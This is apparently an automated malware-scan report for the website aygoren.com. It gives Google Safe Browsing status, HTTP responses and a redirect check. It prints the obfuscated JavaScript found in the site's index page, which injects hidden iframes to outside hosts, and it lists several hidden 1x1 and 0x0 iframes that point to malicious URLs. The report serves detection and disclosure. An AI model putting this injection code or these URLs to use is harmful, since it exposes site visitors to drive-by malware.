Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=aygoren.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://aygoren.com/ | HTTP/1.1 200 OK Date: Thu, 04 Sep 2014 17:58:15 GMT Accept-Ranges: bytes ETag: "7870c5ffca1cf1:bf7a5" Server: Microsoft-IIS/6.0 Content-Length: 4607 Content-Location: http://aygoren.com/index.html Content-Type: text/html Last-Modified: Thu, 17 Jul 2014 20:19:11 GMT X-Powered-By: ASP.NET | clean |
http://aygoren.com/index.html | 200 OK Content-Length: 4607 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _0xec39=["\x3C\x73\x74\x79\x6C\x65\x3E\x2E\x61\x64\x73\x20\x7B\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x61\x62\x73\x6F\x6C\x75\x74\x65\x3B\x20\x6C\x65\x66\x74\x3A\x2D\x31\x35\x30\x30\x70\x78\x3B\x20\x74\x6F\x70\x3A\x2D\x31\x30\x30\x30\x70\x78\x7D\x3C\x2F\x73\x74\x79\x6C\x65\x3E","\x77\x72\x69\x74\x65","\x3C\x64\x69\x76\x20\x63\x6C\x61\x73\x73\x3D\x27\x61\x64\x73\x27\x3E\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x76\x63\x68\x32\x31\x30\x31\x2E\x69\x6E\x2F\x3F\x74\x72\x66\x27\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x3C\x2F\x64\x69\x76\x3E"];document[_0xec39[1]](_0xec39[0]);document[_0xec39[1]](_0xec39[2]); Decoded script: var k0e0y0S="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var hgRk="PGlmcmFtZSBzcmM9Imh0dHA6Ly9kaXJlY3QtY29ubmVjdC5ydSIgd2lkdGg9IjAiIGhlaWdodD0iMCIgZnJhbWVib3JkZXI9IjAiPjwvaWZyYW1lPg==";var FXnn="";var JGwu,llw4,KsGT,Pgmb,fWOI,apZG,c11A="";var i=0;var base64test=/[^A-Za-z0-9\+\/\=]/g;hgRk=hgRk.replace(/[^A-Za-z0-9\+\/\=]/g,"");do{Pgmb=k0e0y0S.indexOf(hgRk.charAt(i++));fWOI=k0e0y0S.indexOf(hgRk.charAt(i++));apZG=k0e0y0S.inde ...[1377 bytes skipped]... Antivirus reports:
Hidden iFrame found. size: 1x1 src: http://goo.gl/6ctl84 <iframe src="http://goo.gl/6ctl84" width="1" height="1"> Hidden iFrame found. size: 0x0 src: http://zabiyaka.org/file/ok.php <iframe src="http://zabiyaka.org/file/ok.php" width="0" height="0"> Malicious iFrame found. size: 1x1 src: http://23.90.4.184/etc/styles/zpanelx/img/ico/get.php This URL is marked by Google as suspicious <iframe src="http://23.90.4.184/etc/styles/zpanelx/img/ico/get.php" width="1" height="1"> Hidden iFrame found. size: 1x1 src: http://119.59.84.51/rotator/scripts/wow.html <iframe src="http://119.59.84.51/rotator/scripts/wow.html" width="1" height="1"> Hidden iFrame found. size: 1x1 src: http://119.59.84.51/java.php <iframe src="http://119.59.84.51/java.php" width="1" height="1"> Hidden iFrame found. size: 0x0 src: http://2gesichter.com/ok.php <iframe src="http://2gesichter.com/ok.php" width="0" height="0"> Hidden iFrame found. size: 1x1 src: http://gamedev.raconsultants.net/ok.php <iframe src="http://gamedev.raconsultants.net/ok.php" width="1" height="1"> Hidden iFrame found. size: 1x1 src: http://119.59.84.51/go.php <iframe src="http://119.59.84.51/go.php" width="1" height="1"> | ||
http://aygoren.com/test404page.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: aygoren.com
Result:
HTTP/1.1 200 OK
Date: Thu, 04 Sep 2014 17:58:15 GMT
Accept-Ranges: bytes
ETag: "7870c5ffca1cf1:bf7a5"
Server: Microsoft-IIS/6.0
Content-Length: 4607
Content-Location: http://aygoren.com/index.html
Content-Type: text/html
Last-Modified: Thu, 17 Jul 2014 20:19:11 GMT
X-Powered-By: ASP.NET
...4607 bytes of data.
GET / HTTP/1.1
Host: aygoren.com
Result:
HTTP/1.1 200 OK
Date: Thu, 04 Sep 2014 17:58:15 GMT
Accept-Ranges: bytes
ETag: "7870c5ffca1cf1:bf7a5"
Server: Microsoft-IIS/6.0
Content-Length: 4607
Content-Location: http://aygoren.com/index.html
Content-Type: text/html
Last-Modified: Thu, 17 Jul 2014 20:19:11 GMT
X-Powered-By: ASP.NET
...4607 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: aygoren.com
Referer: http://www.google.com/search?q=aygoren.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: aygoren.com
Referer: http://www.google.com/search?q=aygoren.com
Result:
The result is similar to the first query. There are no suspicious redirects found.